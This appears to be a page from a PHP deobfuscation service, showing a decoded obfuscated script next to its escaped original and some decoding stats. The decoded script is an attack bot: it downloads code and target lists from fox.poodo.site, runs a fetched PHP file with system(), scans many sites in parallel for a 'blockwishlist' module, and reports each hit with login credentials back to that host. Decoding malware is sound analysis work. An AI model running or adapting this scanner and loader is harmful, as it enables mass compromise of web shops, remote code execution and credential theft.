Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto DYMOy; JWtlF: ini_set("\x6d\145\155\x6f\x72\171\137\x6c\x69\155\x69\x74", "\x..

Decoded Output download

<?php 
 goto DYMOy; JWtlF: ini_set("memory_limit", "512M"); goto fnDyg; YhIwr: file_put_contents("roll.txt", http_get_contents("http://fox.poodo.site/st/roll.txt")); goto Fhl61; Fhl61: file_put_contents("angry.txt", http_get_contents("http://fox.poodo.site/st/angry.txt")); goto DQB71; bjkuN: system("php inc.class.cms.59.bwl.php"); goto rHOx5; wETjk: require_once "angry.txt"; goto cpGDA; BOnBV: $f = fopen("get_59bwl.txt", "r"); goto k7P7c; nTpJ8: file_put_contents("inc.class.cms.59.bwl.php", http_get_contents("http://fox.poodo.site/st/get_59bwl.txt")); goto hLOSy; k7P7c: while (!feof($f)) { $url = trim(fgets($f)); $AC->get($url); } goto dD1Ll; fnDyg: date_default_timezone_set("Europe/Kiev"); goto GANug; GANug: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto nTpJ8; D3g5P: $AC->load_useragent_list("list.txt"); goto BOnBV; dD1Ll: $AC->execute(50); goto Ly5gT; Ly5gT: unlink("get_59bwl.txt"); goto bjkuN; DQB71: require_once "roll.txt"; goto wETjk; l0xKi: function callback_function($response, $info, $request) { if (strpos($response, "<name>blockwishlist</name>") !== false && strpos($response, "<title>") == false) { $login = "bwl"; $password = ''; echo PHP_EOL . " ===================== ok: =====================  " . $info["url"] . " - " . $login . ":" . $password . '' . PHP_EOL; http_get_contents("http://fox.poodo.site/cms59.php?we=" . base64_encode($info["url"]) . "&fe=" . base64_encode("inc.class.cms.59.bwl.php") . "&cm=" . base64_encode("59") . "&sl=" . base64_encode($login) . "&sp=" . base64_encode($password)); goto end; } end: return; } goto vyE_f; hLOSy: file_put_contents("list.txt", http_get_contents("http://fox.poodo.site/st/list.txt")); goto YhIwr; vyE_f: $AC = new AngryCurl("callback_function"); goto D3g5P; cpGDA: file_put_contents("get_59bwl.txt", http_get_contents("http://fox.poodo.site/get_cms59bwl.php")); goto l0xKi; DYMOy: ini_set("max_execution_time", 0); goto JWtlF; rHOx5: ?> 

Did this file decode correctly?

Original Code

<?php
 goto DYMOy; JWtlF: ini_set("\x6d\145\155\x6f\x72\171\137\x6c\x69\155\x69\x74", "\x35\x31\62\115"); goto fnDyg; YhIwr: file_put_contents("\162\157\x6c\x6c\x2e\x74\x78\x74", http_get_contents("\x68\164\164\160\72\57\57\x66\157\170\56\160\x6f\157\x64\157\56\x73\151\164\x65\57\x73\x74\57\x72\x6f\x6c\x6c\56\x74\x78\x74")); goto Fhl61; Fhl61: file_put_contents("\x61\x6e\147\x72\x79\x2e\164\x78\x74", http_get_contents("\x68\164\x74\x70\x3a\57\x2f\146\x6f\170\x2e\160\x6f\157\x64\x6f\56\x73\x69\164\x65\57\x73\x74\x2f\x61\156\x67\162\x79\x2e\x74\170\x74")); goto DQB71; bjkuN: system("\x70\150\x70\x20\151\156\x63\56\x63\x6c\141\x73\x73\x2e\143\x6d\x73\x2e\65\x39\56\142\x77\154\x2e\160\x68\160"); goto rHOx5; wETjk: require_once "\141\x6e\147\x72\x79\x2e\x74\170\164"; goto cpGDA; BOnBV: $f = fopen("\x67\145\x74\x5f\x35\71\142\x77\154\56\x74\x78\164", "\x72"); goto k7P7c; nTpJ8: file_put_contents("\x69\x6e\143\56\x63\x6c\141\163\163\56\143\155\163\x2e\x35\x39\56\142\167\x6c\x2e\160\150\x70", http_get_contents("\150\x74\x74\x70\x3a\x2f\x2f\146\157\x78\x2e\x70\x6f\157\x64\x6f\x2e\163\x69\x74\x65\x2f\163\x74\x2f\147\145\x74\137\65\x39\142\167\x6c\x2e\x74\170\x74")); goto hLOSy; k7P7c: while (!feof($f)) { $url = trim(fgets($f)); $AC->get($url); } goto dD1Ll; fnDyg: date_default_timezone_set("\x45\x75\x72\x6f\x70\145\x2f\x4b\151\145\x76"); goto GANug; GANug: function http_get_contents($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $urlPage = curl_exec($ch); curl_close($ch); return $urlPage; } goto nTpJ8; D3g5P: $AC->load_useragent_list("\154\151\163\x74\x2e\x74\x78\x74"); goto BOnBV; dD1Ll: $AC->execute(50); goto Ly5gT; Ly5gT: unlink("\x67\x65\x74\137\65\x39\x62\167\154\56\164\170\164"); goto bjkuN; DQB71: require_once "\162\x6f\154\x6c\56\x74\x78\x74"; goto wETjk; l0xKi: function callback_function($response, $info, $request) { if (strpos($response, "\x3c\x6e\141\155\145\x3e\x62\x6c\157\143\153\x77\151\x73\150\x6c\151\163\x74\74\57\156\x61\x6d\x65\x3e") !== false && strpos($response, "\x3c\x74\151\x74\x6c\x65\x3e") == false) { $login = "\142\167\154"; $password = ''; echo PHP_EOL . "\40\75\75\75\x3d\75\x3d\x3d\75\x3d\x3d\75\75\75\x3d\75\75\75\75\75\x3d\x3d\x20\157\x6b\72\40\75\75\x3d\75\x3d\x3d\75\75\75\75\x3d\75\75\x3d\x3d\x3d\x3d\x3d\75\x3d\75\40\x20" . $info["\165\162\154"] . "\x20\55\x20" . $login . "\72" . $password . '' . PHP_EOL; http_get_contents("\150\164\164\x70\x3a\57\x2f\146\x6f\170\x2e\x70\157\157\x64\x6f\x2e\163\151\164\145\57\x63\x6d\163\x35\71\56\x70\150\x70\x3f\167\145\75" . base64_encode($info["\x75\162\x6c"]) . "\46\x66\x65\x3d" . base64_encode("\x69\156\x63\x2e\143\x6c\x61\x73\x73\56\x63\155\x73\56\x35\x39\56\142\167\x6c\56\160\150\x70") . "\46\x63\x6d\75" . base64_encode("\65\x39") . "\46\163\154\75" . base64_encode($login) . "\46\163\x70\x3d" . base64_encode($password)); goto end; } end: return; } goto vyE_f; hLOSy: file_put_contents("\x6c\151\163\164\x2e\x74\170\x74", http_get_contents("\x68\x74\x74\160\72\x2f\x2f\146\157\x78\x2e\160\157\x6f\x64\157\56\x73\x69\x74\x65\57\x73\x74\57\x6c\151\x73\x74\x2e\164\170\x74")); goto YhIwr; vyE_f: $AC = new AngryCurl("\143\x61\x6c\154\142\141\143\153\137\x66\x75\156\143\164\151\157\156"); goto D3g5P; cpGDA: file_put_contents("\x67\x65\x74\137\x35\x39\142\167\154\x2e\164\170\164", http_get_contents("\x68\164\164\160\72\x2f\x2f\x66\157\170\x2e\160\x6f\157\144\157\56\x73\151\x74\x65\x2f\147\145\164\x5f\x63\155\x73\x35\71\x62\167\154\x2e\x70\x68\160")); goto l0xKi; DYMOy: ini_set("\155\141\170\x5f\x65\x78\x65\143\x75\x74\x69\157\x6e\137\x74\151\155\x65", 0); goto JWtlF; rHOx5: ?>

Function Calls

None

Variables

None

Stats

MD5 ce464ba0cc5bb401f8b2c8babf616efd
Eval Count 0
Decode Time 45 ms